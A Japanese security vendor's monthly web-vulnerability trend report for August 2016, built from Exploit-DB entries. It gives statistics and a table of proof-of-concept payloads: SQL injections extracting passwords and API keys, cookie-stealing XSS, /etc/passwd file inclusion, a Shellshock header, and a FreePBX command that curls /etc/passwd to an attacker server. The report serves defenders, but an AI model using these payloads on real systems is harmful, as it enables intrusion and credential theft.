2016 - Penta Security Systems Inc. · WSO2 Carbon 7 Nagios Network Analyzer 5 Wordpress 5 Sakai 4 Nagios Incident Manager 2 NUUO NVRmini 2 FreePBX 2 Navis WebAccess 1 Nagios Log Server

2016.08

1. 脆弱性別件数脆弱性カテゴリ件数

ファイルアップロード

(File Upload)1

リモートコマンド実行

(Remote Command Execution)2

ディレクトリトラバーサル

(Directory Traversal)2

ローカルファイル挿入

(Local File Inclusion:LFI)4

コマンドインジェクション

(Command Injection)5

SQL インジェクション

(SQL Injection)10

クロスサイトスクリプティング

(Cross Site Scripting : XSS)12

合計 36

2. 危険度別件数危険度件数割合

早急対応要 3 8%

高 33 92%

合計 36 100%

3. 攻撃実行の難易度別件数難易度件数割合

難 3 6%

中 12 24%

易 32 65%

合計 49 100%

4. 主なソフトウェア別脆弱性発生件数ソフトウェア名件数

WSO2 Carbon 7

Nagios Network Analyzer 5

Wordpress 5

Sakai 4

Nagios Incident Manager 2

NUUO NVRmini 2

FreePBX 2

Navis WebAccess 1

Nagios Log Server 1

PHP Power Browse 1

chatNow 1

phpCollab CMS 1

Davolink 1

Subrion CMS 1

Zabbix 1

WebNMS Framework Server 1

合計 36

EDB-Report最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

サマリー

2016年8月に公開されたExploit-DBの分析結果、Cross Site Scriptingの攻撃に対する脆弱性報告件数が最も多かったです。発見されたCross Site Scriptingらの攻撃は単にスクリプトを使用したり、イメージタグを使用す

るなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした。しかし、Cross Site Scriptingの攻撃は、スクリプトおよび特定タグが実行されると、脆弱な部分に実際の多様なコードが挿入ができる攻撃

なので、スクリプトおよびタグなどの実行自体ができないようにしなければなりません。したがって、脆弱性が発見された該当ソフトウェアを使用する管理者はそのスクリプトおよびイメージタグが実行されるかを確認した後、必ずセキュアコー

ディングおよびアップデートが必要と考えられます。Cross Site Scripting以外の脆弱性では、Linux Bashの脆弱性としてよく知られているShellShockの脆弱性が発見されました。攻撃パターンは、主にHTTP Headerに入り、

CGIが実行される際、任意の命令語が実行されることができます。2014年に初めて発見されたShellShockの脆弱性は、OpenSSLの脆弱性であるHeartBleed脆弱性よりもっと波及力が大きな脆弱性でしたが、現在はBash

Updateを最新に実施して、解決することができます。古いバージョンのLinuxを使用している管理者であればこのようなセキュリティアップデートを実施し、ShellShockと同じ脆弱性に露出されて、規模の大きいセキュリティ事故とつなが

らないように注意しなければなりません。

ペンタセキュリティシステムズ株式会社R&Dセンター　データセキュリティチーム

1

2 2

4

5

10

12

0

2

4

6

8

10

12

14

File Upload RemoteCommandExecution

DirectoryTraversal

LFI CommandInjection

SQL Injection XSS

脆弱性別件数

3

33

危険度別件数

早急対応要

高

3

12

32

攻撃実行の難易度別件数

難

中

易

7

5

54

2

2

2

1

1

1

11

11 1

主なソフトウェア別脆弱性発生件数

WSO2 Carbon

Nagios Network Analyzer

Wordpress

Sakai

Nagios Incident Manager

NUUO NVRmini

FreePBX

Navis WebAccess

Nagios Log Server

PHP Power Browse

chatNow

phpCollab CMS

Davolink

日付 EDB番号脆弱性カテゴリ攻撃難脆弱性度危険度脆弱性名攻撃コード対象プログラム対象環境

2016-08-01 40190 XSS 中高WordPress WP Live Chat

Support Plugin 6.2.03 - admin-ajax.php XSS 脆弱性

POST /wp-admin/admin-ajax.php HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105,110, 32, 110, 97, 109, 101, 33, 34, 41,59));</script>&email=Mail&msg=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83,32, 105, 110, 32, 109, 115, 103, 33, 34, 41,59));</script>

WordpressWordPress WP

Live Chat SupportPlugin 6.2.03

2016-08-01 40189 SQL Injection 難早急対応要WordPress Booking Calendar

Plugin 6.2 - SQL Injection

POST /wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_date=3&view_mode=vm_listing HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

wh_booking_id=3 AND (SELECT 5283 FROM(SELECTCOUNT(*),CONCAT(0x7176626271,(SELECTMID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54)FROM wordpress.wp_users ORDER BY ID LIMIT0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.CHARACTER_SETS GROUP BYx)a)

WordpressWordPress

Booking CalendarPlugin 6.2

2016-08-05 40206 XSS 中高WordPress Count per Day Plugin

3.5.4 - / XSS 脆弱性

GET / HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10_11_5) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/51.0.2704.103 Safari/537.36Referer:javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))

WordpressWordPress Count

per Day Plugin3.5.4

2016-08-05 40205 XSS 易高 Davolink DV-2051 - / XSS 脆弱性/scvrtsrv.cmd?action=add&srvName=FooBar<iframe%20onload=alert(0)>&srvAddr=192.168.1.100&proto=1,&eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444,

DavolinkDavolink DV-

2051

2016-08-05 40204 LFI 易高PHP Power Browse 1.2 -browse.php LFI 脆弱性

/browse.php?p=source&file=/etc/passwd PHP PowerBrowse

PHP PowerBrowse 1.2

2016-08-05 40202 SQL Injection 易高Subrion CMS 4.0.5 -

/admin/database/sql/ SQLInjection 脆弱性

POST /admin/database/sql/ HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

query=1 and 1=1--&show_query=1 or 1=1--&exec_query=Go

Subrion CMSSubrion CMS

4.0.5



Copyright 2016 Penta Security Systems Inc. All rights reserved




2016-08-06 40213Remote Command

Execution難早急対応要

NUUO NVRmini 2 3.0.8 - /cgi-

bin/cgi_system RCE 脆弱性

POST / HTTP/1.1

Host:

User-Agent: () { :;}; /bin/ls -al

Accept: */*

Content-Type: application/x-www-form-urlencoded;

charset=UTF-8

cmd=ftp_setup&act=modify&com_port=21&pasv_port_fr

om=1024&pasv_port_to=65535&services=enable

NUUO NVRminiNUUO NVRmini 2

3.0.8

2016-08-06 40212 Command Injection 易高NUUO NVRmini 2 3.0.8 - /cgi-

bin/cgi_system CommandInjection 脆弱性

POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no

NUUO NVRminiNUUO NVRmini 2

3.0.8

2016-08-08 40218 SQL Injection 易高phpCollab CMS 2.5 -

emailusers.php SQL Injection 脆弱性

/phpcollab/users/emailusers.php?id=1%20or%201=1--&&PHPSESSID=ghtu76jt276nji04lua07930t5

phpCollab CMSphpCollab CMS

2.5

2016-08-08 40216 SQL Injection 易高Navis WebAccess -

showNotice.do SQL Injection 脆弱性

/express/showNotice.do?report_type=1&GKEY=2 AND9753=(SELECTUPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASEWHEN (9753=9753) THEN 1 ELSE 0 END) FROMDUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)

Navis WebAccess Navis WebAcces

2016-08-10 40229 Directory Traversal 易高WebNMS Framework Server 5.2and 5.2 SP1 - /servlets/ Directory

Traversal 脆弱性

POST/servlets/FileUploadServlet?fileName=../jsp/Login.jspHTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

WebNMSFramework

Server

WebNMSFramework

Server 5.2 and5.2 SP1

2016-08-15 40237 SQL Injection 易高Zabbix 2.2.x, 3.0.x - latest.php

SQL Injection 脆弱性

/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385)%3B%20select%20*%20from%20users%20where%20(1%3D1

ZabbixZabbix 2.2.x,

3.0.x

2016-08-16 40241 XSS 易高WSO2 Carbon 4.4.5 -

challenges-mgt.jsp XSS 脆弱性

/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS&setName="/><script>alert(document.cookie)</script>

WSO2 CarbonWSO2 Carbon

4.4.5





2016-08-16 40240 LFI 易高WSO2 Carbon 4.4.5 -

downloadgz-ajaxprocessor.jspLFI 脆弱性

/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml&tenantDomain=&serviceName=


4.4.5

2016-08-16 40252 Command Injection 中高

Nagios Incident Manager 2.0.0 -

/nagiosim/reports/download/

Command Injection 脆弱性

/nagiosim/reports/download/jpg/mttr/c3RhcnRfZGF0ZT0

yMDE2LTA1LTA2JmVuZF9kYXRlPTIwMTYtMDUtMDYmdHl

wZXNbXT0yIiIiO3t0b3VjaCwvdG1wL01ZRklMRX07ZWNob

w==

Nagios Incident

Manager

Nagios Incident

Manager 2.0.0

2016-08-16 40251 SQL Injection 中高Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/api/checks

/ SQL Injection 脆弱性

/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=name%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC

Nagios NetworkAnalyzer

Nagios NetworkAnalyzer 2.2.0

2016-08-16 40250 Command Injection 中高Nagios Log Server 1.4.1 -

Multiple Vulnerabilities

POST /nagioslogserver/api/check/create/1 HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64

AppleWebKit/535.7 KHTML, like Gecko

Chrome/16.0.912.75 Safari/535.7

Accept: */*


charset=UTF-8

alert={"name"%3a"StduserAlertTest","check_interval"%3a"

1m","lookback_period"%3a"1m","warning"%3a"1","critical"

%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/to

uch",

"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created

_by"%3a"stduser","query_id"%3a"AVTLGmd-

GYGKrkWMo5Tc"}

Nagios Log

Server

Nagios Log

Server 1.4.1

2016-08-16 40252 SQL Injection 難早急対応要Nagios Incident Manager 2.0.0 -/nagiosim/admin/settings SQL

Injection 脆弱性

POST /nagiosim/admin/settings HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

timezone=Pacific/Samoa' AND (SELECT 5323FROM(SELECTCOUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() ASCHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a) AND '

Nagios IncidentManager

Nagios IncidentManager 2.0.0

2016-08-16 40251 SQL Injection 中高Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/api/source

s/ SQL Injection 脆弱性 #

/nagiosna/index.php/api/sources/read?o%5Bcol%5D=name%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC







2016-08-16 40251 SQL Injection 中高Nagios Network Analyzer 2.2.0 -

/nagiosna/index.php/admin/SQL Injection 脆弱性 #

POST /nagiosna/index.php/admin/globals HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

timezone=US/Eastern%' AND (SELECT 4646FROM(SELECT COUNT(*),CONCAT(0x232323,(SELECTMID((IFNULL(CAST(apikey AS CHAR),0x20)),1,54) FROMnagiosna_users WHERE id=1 LIMIT0,1),0x232323,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.CHARACTER_SETS GROUP BYx)a) AND '%'=''




Nagios Network Analyzer 2.2.0 -

/nagiosna/index.php/download/r

eport/sourcegroup/ Command

Injection 脆弱性

/nagiosna/index.php/download/report/sourcegroup/test/

cVtyaWRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1R

FU1RGSUxFfTtlY2hvICI=

Nagios Network

Analyzer

Nagios Network

Analyzer 2.2.0


Nagios Network Analyzer 2.2.0 -

/nagiosna/index.php/download/r

eport/source/ Command

Injection 脆弱性

/nagiosna/index.php/download/report/source/test/cVtya

WRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1RFU1R

GSUxFfTtlY2hvICI=

Nagios Network

Analyzer

Nagios Network

Analyzer 2.2.0

2016-08-16 40241 XSS 易高WSO2 Carbon 4.4.5 -

challenges-mgt-finish.jsp XSS 脆弱性 #

/carbon/identity-mgt/challenges-mgt-finish.jsp?setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question0=&question1=City+where+you+were+born+%3F&setId1=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question1=City+where+you+were+born+%3F&question2=Father%27s+middle+name+%3F&setId2=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question2=Father%27s+middle+name+%3F&question3=Name+of+your+first+pet+%3F&setId3=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question3=Name+of+your+first+pet+%3F&question4=Favorite+sport+%3F&setId4=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question4=Favorite+sport+%3F&question5=Favorite+food+%3F&setId5=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question5=Favorite+food+%3F&question6=Favorite+vacation+location+%3F&setId6=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1&question6=Favorite+vacation+location+%3F&question7=Model+of+your+first+car+%3F&setId7=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question7=Model+of+your+first+car+%3F&question8=Name+of+the+hospital+where+you+were+born+%3F&setId8=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&question8=Name+of+the+hospital+where+you+were+born+%3F&setId9=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&question9=XSS


4.4.5

2016-08-16 40241 XSS 易高WSO2 Carbon 4.4.5 -

webapp_info.jsp XSS 脆弱性

/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&webappState=all&hostName=victim-server&httpPort=9763&defaultHostName=victim-server&webappType=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\\n\\n%27%20%2bdocument.cookie%29%3C/script%3E


4.4.5

2016-08-16 40241 XSS 易高WSO2 Carbon 4.4.5 -

newdatasource.jsp XSS 脆弱性

/carbon/ndatasource/newdatasource.jsp?dsName=%22o

nMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%

20\\n\\n%27%2bdocument.cookie%29&edit=HELLWSO2 Carbon

WSO2 Carbon

4.4.5





2016-08-16 40241 XSS 易高WSO2 Carbon 4.4.5 -validateconnection-

ajaxprocessor.jsp 脆弱性

/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&driver=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E&username=root&dsType=RDBMS&customDsType=RDBMS&dsProviderType=default&dsclassname=undefined&dsclassname=undefined&dsproviderProperties=undefined&editMode=false&changePassword=true&newPassword=


4.4.5

2016-08-16 40241 XSS 易高WSO2 Carbon 4.4.5 -

handlers.jsp XSS 脆弱性

/carbon/viewflows/handlers.jsp?retainlastbc=true&flow=in&phase=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


4.4.5

2016-08-22 40288 Directory Traversal 易高

WordPress 4.5.3 - admin-

ajax.php Directory Traversal 脆弱

性

POST /wp-admin/admin-ajax.php HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64

AppleWebKit/535.7 KHTML, like Gecko

Chrome/16.0.912.75 Safari/535.7

Accept: */*


charset=UTF-8

plugin=../../../../../../../../../../dev/random&action=update-

plugin

Wordpress WordPress 4.5.3

2016-08-22 40286 File Upload 中高 Sakai 10.7 - / File Upload 脆弱性

POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1Host:Connection: CloseAccept: text/html,application/xhtml+xml, */*Accept-Language: ko-KRUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0;Windows NT 6.2; WOW64; Trident/6.0)Content-Type: multipart/form-data; boundary=---------------------------7dd10029908f2

-----------------------------7dd10029908f2Content-Disposition: form-data; name="file";filename="test.jsp'-alert(1)-'foo"Content-Type: application/octet-stream

test-----------------------------7dd10029908f2--

Sakai Sakai 10.7

2016-08-22 40286 XSS 易高

Sakai 10.7 -

/portal/tool/~admin-1010/ XSS

脆弱性

/portal/tool/~admin-

1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A

_id10=Data+Warehouse+Update&_id2:_id14=Post&com.

sun.faces.VIEW=&_id2=_id2

Sakai Sakai 10.7

2016-08-22 40286 XSS 易高Sakai 10.7 -

/access/basiclti/site/~admin/ XSS脆弱性

/access/basiclti/site/~admin/axxm4j<img src=aonerror=alert(3)>

Sakai Sakai 10.7





2016-08-22 40286 LFI 易高Sakai 10.7 - /portal/tool/ LFI 脆

弱性

/portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml

Sakai Sakai 10.7

2016-08-23 40293 XSS 易高 chatNow - login.php XSS 脆弱性

POST/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1 HTTP/1.1Host:User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64AppleWebKit/535.7 KHTML, like GeckoChrome/16.0.912.75 Safari/535.7Accept: */*Content-Type: application/x-www-form-urlencoded;charset=UTF-8

chatNow chatNow

2016-08-23 40290 LFI 易高WordPress Mail Masta Plugin

1.0 - count_of_send.php LFI 脆弱性

/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

WordpressWordPress MailMasta Plugin 1.

2016-08-29 40296Remote Command

Execution中高

FreePBX 13.0.35 - config.phpRCE 脆弱性

/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x"http://Attacker_server:8080/0x4148.jnk

FreePBX FreePBX 13.0.35

2016-08-29 40312 SQL Injection 中高FreePBX 13.0.35 - config.php

SQL Injection 脆弱性/admin/config.php?display=f4ris"XOR(if(6661=6661,sleep(0.03),0))OR"*/

FreePBX FreePBX 13.0.35


Documents

2016 - Penta Security Systems Inc. · WSO2 Carbon 7 Nagios Network Analyzer 5 Wordpress 5 Sakai 4 Nagios Incident Manager 2 NUUO NVRmini 2 FreePBX 2 Navis WebAccess 1 Nagios Log Server